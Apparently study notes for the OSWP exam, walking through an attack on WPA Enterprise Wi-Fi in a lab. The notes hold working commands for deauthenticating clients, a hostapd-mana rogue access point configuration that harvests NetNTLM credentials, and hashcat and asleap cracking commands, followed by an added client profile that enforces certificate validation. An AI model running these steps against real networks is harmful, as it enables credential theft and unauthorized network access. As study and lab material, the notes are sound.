WPA Enterprise (WPA-MGT)
1. Finding WPA-MGT networks
You can find these networks on both the 2.4 GHz and 5 GHz bands:
# dump 2.4 GHz
sudo airodump-ng wlan0mon
# dump 5 GHz
sudo airodump-ng -b a wlan0mon
In the "AUTH" column of the airodump-ng output, look for "MGT".

2. Finding the certificate information
To attack WPA Enterprise we build our own rogue AP, but to do so we need to create a certificate that carries the same information as the target's. To obtain that information, we need to capture a handshake, as in the WPA2 attacks.
Use airodump-ng to capture the handshake:
sudo airodump-ng wlan0mon --bssid F0:9F:C2:71:22:15 -c 44 -w wpamgt
Do a deauth attack:
sudo aireplay-ng -0 5 -c 64:32:A8:07:6C:40 -a F0:9F:C2:71:22:15 wlan0mon
If successful, you will see "WPA handshake: X".

Open the wpamgt.cap file with Wireshark and set the filter to tls.handshake.certificate:

Now extract the certificate with:

Save it as "cert.der" and extract the information using:
openssl x509 -inform der -in cert.der -text
The information we need:

3. Setting up the rogue AP
To attack a client that does not properly validate the server certificate on an MGT network, we create a rogue AP with the same ESSID and configuration but a self-signed certificate, preferably carrying the same data as the real one in case the client manually checks the certificate. To do this you can use "eaphammer".
eaphammer is not allowed on the OSWP exam; use freeradius with hostapd-mana instead.
python3 ./eaphammer --cert-wizard

When this is completed, start the rogue AP with:
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced

3.1 Using freeradius with hostapd-mana
First of all, install freeradius:
sudo apt-get install freeradius
Go to /etc/freeradius/3.0/certs and open ca.cnf and server.cnf.
Set the values below to the information obtained from the certificate:


After that, run the following commands under /etc/freeradius/3.0/certs to generate the Diffie-Hellman parameters for hostapd-mana:
rm dh
make

Next, create a file called mana.eap_user with the following contents:
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
After that, create the rogue AP configuration in a file called network.conf (in any directory):
ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211
channel=<channel>
hw_mode=a # 5 GHz; use 'g' for 2.4 GHz networks
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
Make sure eap_user_file points to the directory where you saved mana.eap_user. Start the fake AP with hostapd-mana:
sudo hostapd-mana network.conf
4. Broadcast deauth to all APs
With "airodump-ng" we find the MAC addresses of the clients to deauthenticate, and we run the attack against both clients in parallel. Because there are two APs, the attack has to be performed against both: a client disconnected from one may otherwise reconnect to the other instead of to our rogue AP.
sudo iwconfig wlan0mon channel 44
Next we send a broadcast deauth to both APs while our rogue AP is listening:
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan0mon
If successful, we receive a NetNTLM hash:

5. Crack the hash
hashcat -a 0 -m 5500 juan.tr::::673256730e43f7a67c712534e0970f86160487ce60e560bc:009f9888b8c646ec /root/rockyou-top100000.txt --force

5.1 Use asleap
If you cannot use hashcat you can use asleap to get the password instead:
asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst
6. Connect to the network
Create a wpa_supplicant configuration file (here network.conf):
network={
    ssid="NetworkName"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity="Domain\username"
    password="password"
    eap=PEAP
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
Connect:
wpa_supplicant -c network.conf -i <interface>
Get IP:
sudo dhclient wlan3
ip addr show wlan3
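The client profile above accepts any server certificate, which is exactly the weakness the rogue AP in section 3 relies on. As an added example (not part of the original notes), here is the same PEAP profile with server validation enabled; the CA bundle path, the RADIUS domain suffix and the outer identity are assumed placeholders:

```conf
network={
    ssid="NetworkName"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    # Outer identity sent in the clear; keeps the real username out of captures
    anonymous_identity="anonymous"
    identity="Domain\username"
    password="password"
    # CA that signed the legitimate RADIUS server certificate (assumed path)
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # Reject any server whose certificate name does not end in this suffix (assumed domain)
    domain_suffix_match="radius.example.com"
    # PEAPv0 with MSCHAPv2 inside the tunnel; if the certificate does not chain to
    # ca_cert the TLS handshake fails and no MSCHAPv2 response is ever sent
    phase1="peapver=0 peaplabel=0"
    phase2="auth=MSCHAPV2"
}
```

With ca_cert and domain_suffix_match set, a self-signed certificate that merely copies the subject fields of the real one is still rejected, because it does not chain to the pinned CA.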
7. Sources
https://zeyadazima.com/notes/oswplaybook/#attacking-wpa-enterprise
https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#18-what-is-juans-wifi-corp-password